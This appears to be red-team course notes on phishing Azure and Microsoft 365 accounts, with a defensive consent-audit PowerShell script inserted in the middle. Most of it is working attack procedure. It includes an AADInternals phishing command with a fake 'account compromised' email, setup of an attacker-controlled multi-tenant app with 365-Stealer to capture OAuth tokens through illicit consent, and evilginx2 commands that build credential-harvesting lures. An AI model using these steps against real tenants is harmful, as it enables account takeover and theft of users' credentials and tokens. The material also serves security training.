Phishing Azure Accounts
phishing with aadinternals
$message = 'Dear recipient, <br> Your Microsoft account has been compromised. Login at <a href="{1}">https://microsoft.com</a> to reset your password. <br> Use the following security code: <b>{0}</b>.'
Invoke-AADIntPhishing -Recipients "[email protected]","[email protected]" -Subject "Your Microsoft account is compromised - Actions required." -Sender "Johnny Carson <[email protected]>" -SMTPServer smtp.myserver.local -Message $message -SaveToCache
# if a token was captured
Open-AADIntOWA
Illicit Consent Attack
This depends on the target tenant's "allow user consent for all apps" setting being enabled. This is not the default, but it is very often the case. It cannot be enumerated from an unauthenticated account; a blue-teamer can check it with:
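As an added example (not from the original page or the AADInternals project), the blue-team check expanded into a short script that reports which consent policy the tenant assigns to ordinary users and lists the delegated grants individual users have already consented to, so a defender can review them. It assumes the AzureAD PowerShell module and an existing Connect-AzureAD session; the policy-id strings are Microsoft's documented values.

```powershell
# Added example: report the user-consent setting and review user-consented grants.
# Assumes the AzureAD module is imported and Connect-AzureAD has already been run.
$policy = Get-AzureADMSAuthorizationPolicy
$ids = @($policy.PermissionGrantPolicyIdsAssignedToDefaultUserRole)

if ($ids -contains 'ManagePermissionGrantsForSelf.microsoft-user-default-legacy') {
    Write-Warning 'Users may consent to ANY app (legacy setting): illicit consent phishing will succeed.'
}
elseif ($ids -contains 'ManagePermissionGrantsForSelf.microsoft-user-default-low') {
    Write-Output 'Users may consent only to verified-publisher apps for low-impact permissions.'
}
elseif ($ids.Count -eq 0) {
    Write-Output 'User consent is disabled; app requests fall through to the admin consent workflow.'
}
else {
    Write-Output "Custom permission grant policies assigned to users: $($ids -join ', ')"
}

# Delegated grants with ConsentType 'Principal' were consented by an individual user,
# not by an admin. Show the app, its home tenant, the consenting user, the scopes
# and the reply URLs, which is where a rogue multi-tenant app stands out.
$grants = Get-AzureADOAuth2PermissionGrant -All $true |
    Where-Object { $_.ConsentType -eq 'Principal' }

foreach ($g in $grants) {
    $sp = Get-AzureADServicePrincipal -ObjectId $g.ClientId
    [pscustomobject]@{
        App             = $sp.DisplayName
        AppId           = $sp.AppId
        PublisherTenant = $sp.AppOwnerTenantId
        ConsentedBy     = (Get-AzureADUser -ObjectId $g.PrincipalId).UserPrincipalName
        Scopes          = $g.Scope
        ReplyUrls       = ($sp.ReplyUrls -join ' ')
    }
}

# Mitigation: clear the user-assigned grant policies so users can no longer self-consent.
# Set-AzureADMSAuthorizationPolicy -PermissionGrantPolicyIdsAssignedToDefaultUserRole @()
```

Grants whose PublisherTenant is not your own tenant and whose reply URLs point at an unfamiliar host are the ones to investigate and revoke (Remove-AzureADOAuth2PermissionGrant).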
(Get-AzureADMSAuthorizationPolicy).PermissionGrantPolicyIdsAssignedToDefaultUserRole
Setup phishing infrastructure
In an attacker-controlled tenant, set up a new 'App Registration' in https://portal.azure.com:
- supported account types: Accounts in any organizational directory (Any Microsoft Entra ID tenant - Multi-Tenant)
- redirect to web → point this to your stealer installation, e.g., https://172.16.150.64/login/authorized
- add a client secret
- select low-privilege permissions first, under API permissions (permissions are in MS Graph → delegated): User.Read, User.ReadBasic.All
Note the application-id (called client-id in the application registration overview pane) and the generated client secret.
Now set up 365-Stealer and configure it:
- run the XAMPP control panel as administrator and start Apache
- copy 365-Stealer from c:\AzAD\Tools to c:\xampp\htdocs
- go to http://localhost:82/365-stealer/yourVictims
- configuration: application-id, client-secret, redirect-to-web URL, 1 sec delay
Now you can start the stealer and copy the OAuth2 link that it prints to the shell:
C:\xampp\htdocs\365-Stealer>python 365-Stealer.py --run-app
phishing for credentials with evilginx
evilginx2 -p C:\AzAD\Tools\evilginx2\phishlets
config domain student64.corp
config ip 172.16.150.64
phishlets hostname o365 login.student64.corp
# now set up DNS records for the phishlet hostname
# copy the SSL/TLS certificate and key
phishlets enable o365
lures create o365
lures get-url 0
And send the lure to a phishing victim.